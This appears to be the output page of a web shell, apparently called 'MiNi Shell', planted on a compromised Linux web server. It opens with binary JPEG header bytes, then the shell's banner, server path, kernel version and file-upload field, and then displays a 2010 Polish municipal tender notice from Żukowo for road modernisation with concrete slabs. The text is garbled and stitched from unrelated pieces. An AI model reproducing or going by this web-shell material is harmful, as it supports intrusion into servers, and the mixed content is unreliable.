JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100806/241580-N-2010.html

<p class="kh_header"><b>Żukowo: Modernizacja dróg gminnych z płyt betonowych wielootworowych typu YOMB</b><br>
<b>Numer ogłoszenia: 241580 - 2010; data zamieszczenia: 06.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Żukowo , ul. Gdańska 52, 83-330 Żukowo, woj. pomorskie, tel. +48 58 6858300, faks +48 58 6858300.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zukowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja dróg gminnych z płyt betonowych wielootworowych typu YOMB.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje  modernizacje dróg i ulic położonych na terenie Gminy Żukowo - nawierzchnia z płyt betonowych wielootworowych typu YOMB.
Część I - rejon I  3644 szt. płyt YOMB
Część II - rejon II  3464 szt. płyt YOMB
Część III - rejon III  3364 szt. płyt YOMB
Część IV- rejon IV 3640 szt. płyt YOMB.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przedmiotem zamówienia uzupełniającego może być modernizacja dróg gruntowych poprzez ułożenie płyt betonowych wielootworowych typu YOMB (na drogach objętych zamówieniem podstawowym, wskazane w częściach I-IV). Wartość zamówienia uzupełniającego nie może przekroczyć 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta powinna być zabezpieczona wadium w wysokości: 
CZĘŚĆ I - REJON I - 5.000,00 PLN
CZĘŚĆ II - REJON II - 5.000,00 PLN
CZĘŚĆ III - REJON III - 5.000,00 PLN
CZĘŚĆ IV - REJON IV - 5.000,00 PLN 
Szczegółowy opis na temat wadium został zawarty w pkt. VIII SIWZ.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien wykazać iż w ciągu ostatnich pięciu lat (sierpień 2005 - sierpień 2010) przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, był wykonawcą co najmniej:
Część I - był wykonawcą co najmniej 1 roboty drogowej z nawierzchni rozbieralnej typu kostka, płyty itp. (roboty typu: budowa, modernizacja, remont dróg, placów, chodników itp,) o wartości  min. brutto   300.000,00 zł (wartość samych robót drogowych bez robót towarzyszących typu kanalizacja deszczowa, przebudowa kolizji, budowa oświetlenia ulicznego itp.)
Część II - był wykonawcą co najmniej 1 roboty drogowej z nawierzchni rozbieralnej  typu kostka, płyty itp. (roboty typu: budowa, modernizacja, remont dróg, placów, chodników itp) o wartości  min. brutto   300.000,00 zł (wartość samych robót drogowych bez robót towarzyszących typu kanalizacja deszczowa, przebudowa kolizji, budowa oświetlenia ulicznego itp.)
Część III - był wykonawcą co najmniej 1 roboty drogowej z nawierzchni rozbieralnej  typu kostka, płyty itp. (roboty typu: budowa, modernizacja, remont dróg, placów, chodników itp.) o wartości  min. brutto   300.000,00 zł (wartość samych robót drogowych bez robót towarzyszących typu kanalizacja deszczowa, przebudowa kolizji, budowa oświetlenia ulicznego itp.)
Część IV - był wykonawcą co najmniej 1 roboty drogowej z nawierzchni rozbieralnej  typu kostka, płyty itp. (roboty typu: budowa, modernizacja, remont dróg, placów, chodników itp.) o wartości  min. brutto   300.000,00 zł (wartość samych robót drogowych bez robót towarzyszących typu kanalizacja deszczowa, przebudowa kolizji, budowa oświetlenia ulicznego itp.) 
Uwaga! W przypadku składania oferty na więcej niż jedną część Wykonawca musi wykazać się doświadczeniem dla każdej części osobno czyli wykazać się różnymi robotami drogowymi dla każdej części (wskazane roboty drogowe dla poszczególnych części nie mogą się powtarzać)  lub wykazać się co najmniej  jedną robotą drogową której wartość stanowi sumę wymaganej wartości poszczególnych części np. jeśli składa ofertę na część I i II to wykazuje się co najmniej jedną robotę drogową o wartości min. 600.000 zł brutto. 
Ocena spełnienia warunku odbędzie się na podstawie złożonego przez Wykonawcę wykazu wykonanych robót budowlanych (zał. nr 6 do siwz) w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (protokół odbioru zamówienia przez zamawiającego, referencje, opinie itp.).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować osobami zdolnymi do realizacji niniejszego zamówienia; w tym dla każdej części osobno należy wykazać: 
Część I:
a) kierownik robót posiadający uprawnienia budowlane do wykonywania samodzielnych funkcji w budownictwie w zakresie robót drogowych oraz legitymującym się stosownym dokumentem potwierdzającym, iż jest zrzeszony we właściwych branżowo izbach samorządów zawodowych zgodnie z przepisami ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001 r. Nr 5 poz. 42 z późn. zm.)
b) co najmniej 20 pracownikami, którzy będą bezpośrednio  realizować niniejsze zamówienie takimi jak robotnicy, operatorzy sprzętu, monterzy itp.
Część II:
a) kierownikiem robót posiadający uprawnienia budowlane do wykonywania samodzielnych funkcji w budownictwie w zakresie robót drogowych oraz legitymującym się stosownym dokumentem potwierdzającym, iż jest  zrzeszony we właściwych branżowo izbach samorządów zawodowych zgodnie z przepisami ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001 r. Nr 5 poz. 42 z późn. zm.)
b) co najmniej 20 pracownikami, którzy będą bezpośrednio  realizować niniejsze zamówienie takimi jak robotnicy, operatorzy sprzętu, monterzy itp.
Część III:
a) kierownikiem robót posiadający uprawnienia budowlane do wykonywania samodzielnych funkcji w budownictwie w zakresie robót drogowych oraz legitymującym się stosownym dokumentem potwierdzającym, iż jest  zrzeszony we właściwych branżowo izbach samorządów zawodowych zgodnie z przepisami ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001 r. Nr 5 poz. 42 z późn. zm.)
b) co najmniej 20 pracownikami, którzy będą bezpośrednio  realizować niniejsze zamówienie takimi jak robotnicy, operatorzy sprzętu, monterzy itp.
Część IV:
a) kierownikiem robót posiadający uprawnienia budowlane do wykonywania samodzielnych funkcji w budownictwie w zakresie robót drogowych oraz legitymującym się stosownym dokumentem potwierdzającym, iż jest  zrzeszony we właściwych branżowo izbach samorządów zawodowych zgodnie z przepisami ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001 r. Nr 5 poz. 42 z późn. zm.)
b) co najmniej 20 pracownikami, którzy będą bezpośrednio realizować niniejsze zamówienie takimi jak robotnicy, operatorzy sprzętu, monterzy itp.

UWAGA! Jeżeli wykonawca będzie składał ofertę na dwie części zamówienia to może wskazać te same osoby do pełnienia funkcji kierownika budowy oraz wskazać tych samych pracowników realizujących bezpośrednio niniejsze zamówienie (robotnicy), jeśli wykonawca składa ofertę na trzy lub cztery części zamówienia wykazuje co najmniej dwóch kierowników robót oraz 40 pracowników realizujących bezpośrednio niniejsze zamówienie (robotnicy).

Ocena spełnienia w/w warunku odbędzie się na podstawie: informacji zamieszczonych w zał. nr 7 do siwz - Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) W przypadku spółki cywilnej do oferty należy dołączyć umowę spółki cywilnej, jeżeli inaczej uregulowano zasady współpracy reprezentacji przedsiębiorców spółki.
2) W przypadku gdy wykonawcę reprezentuje pełnomocnik, do oferty musi być załączone pełnomocnictwo określające jego zakres i podpisane przez osoby uprawnione do reprezentacji wykonawcy.
3) W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy złożyć pełnomocnictwo ustanowionego pełnomocnika do reprezentowania wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwa należy złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez notariusza.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. W rozdziale IV siwz zostały przedstawione ogólne warunki umowy.
2. 	Niedopuszczalne pod rygorem nieważności są zmiany postanowień zawartej umowy w stosunku do treści oferty, z wyjątkiem zmian o których mowa w pkt. 3.
3. 	Zmiany w umowie mogą dotyczyć:
1) terminu wykonania zamówienia
2) wysokości wynagrodzenia wykonawcy
3) udziału podwykonawców przy realizacji zamówienia.
4. 	Zmiana terminu wykonania zamówienia może nastąpić w przypadku:
	1) 	przerwy w realizacji zamówienia na skutek warunków atmosferycznych, w tym: 
          a) klęsk żywiołowych,
          b) warunków atmosferycznych odbiegających od typowych, uniemożliwiających prowadzenie robót budowlanych, przeprowadzenie prób i sprawdzeń, dokonywanie odbiorów.       
    2) wystąpienia na trasie budowy przeszkód nie ujętych na mapach projektowych, które będą powodowały przerwę w zamówieniu,          
    3) konieczności wykonania robót zamiennych i dodatkowych, które będą niezbędne dla prawidłowej realizacji przedmiotu zamówienia,
    4)  rezygnacji z realizacji części zamówienia,
    5) czasowego wstrzymania robót przez zamawiającego,
    6) wystąpienia przeszkód uniemożliwiających prowadzenie robót przez wykonawcę,
    7) wprowadzenia zmian w dokumentacji projektowej, które będą wymagały przerwy w realizacji robót,
5. Zmiana wysokości wynagrodzenia wykonawcy może nastąpić w przypadku:
   1)  odstąpienia (rezygnacji) od części zamówienia,  
   2) wykonywania robót dodatkowych i zamiennych (w tym zmiana technologii wykonania  robót), 
   3)  zmiany stawki podatku VAT.
6. Zmiana udziału podwykonawców może nastąpić w przypadku:
   1) skorzystania z podwykonawców w realizacji zamówienia mimo, iż w złożonej ofercie wykonawca nie przewidywał realizacji części zamówienia w podwykonawstwie, 
   2) zmiany zakresu robót realizowanych w podwykonawstwie.
7. Warunki dokonywania zmian:
   1) inicjowania zmian na pisemny wniosek wykonawcy lub zamawiającego,
   2) uzasadnienie konieczności i wpływu zmian na realizację zamówienia: wpisy do dziennika budowy, protokoły konieczności, kosztorysy robót zamiennych, zaniechanych, dodatkowych, odniesienie do postanowień SIWZ,
   3) w formie pisemnego aneksu do umowy pod rygorem nieważności takiej zmiany.
8.  Zmiany zapisów umowy, które nie odnoszą się do treści oferty nie wymagają pisemnego aneksu pod rygorem nieważności.
Za zmiany takie uważa się np.:
    1) zmianę kierownika budowy, inspektora nadzoru, koordynatora za strony zamawiającego,
    2) zmianę rachunku bankowego, 
    3) zmiany adresowe.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.zukowo.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Żukowo ul. Gdańska 52 83-330 Żukowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.08.2010 godzina 12:00, miejsce: Urząd Gminy Żukowo ul. Gdańska 52 83-330 Żukowo (kancelaria pok. nr 3).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I - Rejon I: 3644 szt. płyt YOMB.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rejon I obejmujący następujące drogi:
1)	ul. Nowowiejska w Przyjaźni /kontynuacja/- 860 szt. płyt YOMB
2)	droga Widlino dz. 168 - 200 szt. płyt YOMB
3)	droga w Sulminie dz. 28/2- /kontynuacja/- 300 szt. płyt YOMB
4)	modernizacja Chwaszczynie:
a)	ul.  Sychty - 240 szt. płyt YOMB (kontynuacja),
b)	ul. Ceynowy - 452 szt. płyt YOMB (kontynuacja),
c)	ul. Mickiewicza - 200 szt. płyt YOMB (kontynuacja),
d)	ul. Sarnowskiego - 320 szt. płyt YOMB (kontynuacja)
e)	ul. Kaszubska Droga - 452 szt. płyt YOMB
f)	ul. Majkowskiego - 320 szt. płyt YOMB
g)	ul. Zaciszna - 300 szt. płyt YOMB.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II - Rejon II:  3464 szt. płyt YOMB.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rejon II obejmujący następujące drogi:
1)	droga w Łapinie dz. nr 76 - 300 szt. płyt YOMB
2)	droga Otomino /dz. Nr 22/- 300 szt. płyt YOMB
3)	modernizacja w Rębiechowie: ul. Słoneczna - 560 szt. płyt YOMB (kontynuacja)
4)	modernizacja drogi ul. Malinowa sołectwo Nowy Świat - 300 szt. płyt YOMB,
5)	modernizacja ulic w Żukowie - miasto:
a)	ul. Polna - 200 szt. płyt YOMB (kontynuacja);
b)	 ul. Sambora -  504 szt. płyt YOMB (kontynuacja),
c)	ul. Batorego - 300 szt. płyt YOMB (kontynuacja),
d)	ul. Gdańska - 500 szt. płyt YOMB
6)	modernizacja dróg w Żukowie - wieś: ul. Leśna oraz ul. Książąt Pomorskich - 500 szt. płyt YOMB..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III - Rejon III:  3364 szt. płyt YOMB.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rejon III obejmujący następujące drogi:
1)	modernizacja w Leźnie:
a)	ul. Jagodowe Wzgórza - 332 szt. płyt YOMB (kontynuacja);
b)	droga dz. nr 122 (boczna od drogi gruntowej Leźno-Lniska) - 100 szt. płyt YOMB (kontynuacja)
2)	modernizacja w Lniskach - 500 szt. płyt YOMB;
3)	modernizacja w miejscowości Czaple - 332 szt. płyt YOMB
4)	modernizacja w Pępowie:
a)	 ul. Sikorskiego - 300 szt. płyt YOMB
b)	ul. Staszica - 500 szt. płyt YOMB
5)	modernizacja ul. Brzozowej w Małkowie - 360 szt. płyt YOMB
6) modernizacja w Tuchomiu: ul. Szkolna - 500 szt. płyt YOMB (kontynuacja)
7) modernizacja drogi w Miszewie dz. nr 85/1 - 440 szt. płyt YOMB (kontynuacja).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część IV - Rejon IV:  3640 szt. płyt YOMB.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rejon IV obejmujący następujące drogi:
1)	modernizacja w Borkowie:
a)	ul. Elżbietańska - 460 szt. płyt YOMB (kontynuacja)
b)	ul. Leśna - 240 szt. płyt YOMB
2)	modernizacja w Skrzeszewie - dz. nr 574 i 555 - 720 szt. płyt YOMB
3)	modernizacja w Glinczu:
a)	ul. Szafirowa - 120 szt. płyt YOMB
b)	ul. Grabowa - 500 szt. płyt YOMB
4)	droga dz. nr  163/2 w Rutkach - 180 szt. płyt YOMB (kontynuacja)
